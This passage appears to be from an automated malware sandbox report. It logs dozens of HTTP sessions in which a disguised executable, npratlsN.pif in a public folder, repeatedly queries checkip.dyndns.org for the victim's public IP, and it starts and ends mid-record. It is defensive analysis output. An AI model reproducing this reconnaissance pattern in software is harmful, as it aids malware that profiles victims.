    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Jan 6, 2025 07:53:26.110516071 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Mon, 06 Jan 2025 06:53:26 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: a737fe76d434948f290864ab5942bdbf
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 6, 2025 07:53:27.121128082 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Jan 6, 2025 07:53:27.275130033 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Mon, 06 Jan 2025 06:53:27 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 1bca0f57af2961b11e05f72de9bf97e3
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 6, 2025 07:53:27.495455027 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Mon, 06 Jan 2025 06:53:27 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 1bca0f57af2961b11e05f72de9bf97e3
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49756 | 158.101.44.242 | 80 | 8112 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:53:27.942979097 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Jan 6, 2025 07:53:28.540904045 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Mon, 06 Jan 2025 06:53:28 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: eb97e2ed5b6f967f1d251b9a4e87310c
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49758 | 158.101.44.242 | 80 | 8112 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:53:29.159089088 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 6, 2025 07:53:30.338243961 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:53:30 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: c4bce2ce8b366bba7a25746b42183bed
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49761 | 158.101.44.242 | 80 | 8112 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:53:30.971338034 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 6, 2025 07:53:32.220906019 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:53:32 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 960b4dda42800a1c1073e81b3343e02c
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49763 | 158.101.44.242 | 80 | 8112 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:53:32.965786934 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 6, 2025 07:53:33.863693953 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:53:33 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 6f3f83ac002dfa9c409e6ca50083ceb0
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49765 | 158.101.44.242 | 80 | 8112 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:53:34.609577894 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 6, 2025 07:53:36.187396049 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:53:36 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 99acf69d07bce7afe97d58cce2120237
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49767 | 158.101.44.242 | 80 | 3980 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:53:36.085757971 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 6, 2025 07:53:37.275969982 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:53:37 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 6c1eec7c7d61346bf855029c98f249ed
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 6, 2025 07:53:37.280905008 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 6, 2025 07:53:37.440182924 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:53:37 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 9bb069748482aee9dcc169e6578fe33c
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 6, 2025 07:53:38.883150101 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 6, 2025 07:53:39.057595968 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:53:38 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: a5b6fc6edd580b7c71de1e85bede0118
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49769 | 158.101.44.242 | 80 | 8112 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:53:36.827065945 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 6, 2025 07:53:37.396461964 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:53:37 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b0edd43d94d0ca8f674a0d22bac362b6
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 6, 2025 07:53:37.607492924 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:53:37 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b0edd43d94d0ca8f674a0d22bac362b6
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49772 | 158.101.44.242 | 80 | 8112 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:53:38.107059956 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
Jan 6, 2025 07:53:38.952258110 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:38 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 0118c9422534a0b7f1a7f98e3ad83a45
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49779 | 158.101.44.242 | 80 | 3980 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:53:39.689286947 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
Jan 6, 2025 07:53:40.307842970 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:40 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 51fc2f813d1ec0a1f95c070ee566ee0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49781 | 158.101.44.242 | 80 | 3980 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:53:40.926707983 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
Jan 6, 2025 07:53:42.088367939 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:42 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: adcbfcb6148279fc2b690948851d3cd2
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49785 | 158.101.44.242 | 80 | 3980 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:53:42.740613937 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
Jan 6, 2025 07:53:44.742666006 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:44 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: c76bbc3ef14ce634f07efb2681eb5c29
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49786 | 158.101.44.242 | 80 | 7692 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:53:43.289355040 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
Jan 6, 2025 07:53:44.405309916 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:44 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 1e4b16862992d2b7fbc8c390ed14ff40
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 6, 2025 07:53:44.409743071 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
Jan 6, 2025 07:53:44.615020990 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:44 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: cbf59825bcc77b3b83ee71dcc94577d3
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 6, 2025 07:53:45.776787996 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
Jan 6, 2025 07:53:45.955096006 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:45 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 531fd7a49ba652f142cfc37f3fa9d680
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49790 | 158.101.44.242 | 80 | 3980 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:53:45.375430107 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
Jan 6, 2025 07:53:45.959875107 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:45 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 6438375760564fdc2117717088ed15dd
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49793 | 158.101.44.242 | 80 | 3980 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:53:46.562205076 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:47.801320076 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:47 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 3076fe954d4479a306efcf048e8a773c
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        16 | 192.168.2.4 | 49794 | 158.101.44.242 | 80 | 7692 | C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 6, 2025 07:53:46.613464117 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Jan 6, 2025 07:53:48.638231039 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:48 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: e61d4218e4c90b2e3d2e009819310ead
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        17 | 192.168.2.4 | 49797 | 158.101.44.242 | 80 | 3980 | C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 6, 2025 07:53:48.443300962 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:49.140439034 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:49 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 43e9a560850634501b1b91a1faac75ac
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        18 | 192.168.2.4 | 49800 | 158.101.44.242 | 80 | 7692 | C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 6, 2025 07:53:49.298682928 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:49.892061949 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:49 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 351067e2e353986ddada01cc863b8f4d
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        19 | 192.168.2.4 | 49801 | 158.101.44.242 | 80 | 3980 | C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 6, 2025 07:53:49.771998882 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:50.774971008 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:50 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: ba6f793522f1739f7fb2ff6856d69b1a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        20 | 192.168.2.4 | 49803 | 158.101.44.242 | 80 | 7692 | C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 6, 2025 07:53:50.507527113 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:52.517304897 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:52 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 0f0d3f0ff178a332698cc2209ba2cce8
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        21 | 192.168.2.4 | 49807 | 158.101.44.242 | 80 | 7692 | C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 6, 2025 07:53:53.222492933 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:54.550441980 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:54 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 41d9af342a427385c5eade4aff252303
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        22 | 192.168.2.4 | 49810 | 158.101.44.242 | 80 | 7692 | C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 6, 2025 07:53:55.202835083 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:56.323334932 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:56 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 6259dbadf94e2191af20e40b3dc4e386
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        23 | 192.168.2.4 | 49812 | 158.101.44.242 | 80 | 7692 | C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 6, 2025 07:53:56.939414024 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 6, 2025 07:53:57.517117023 CET | 321 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:57 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Request-ID: 220ccea69bc0e27b1a0b81abcf853691
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49815 | 158.101.44.242 | 80 | 7692 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:53:58.148618937 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 6, 2025 07:53:58.734035969 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:53:58 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
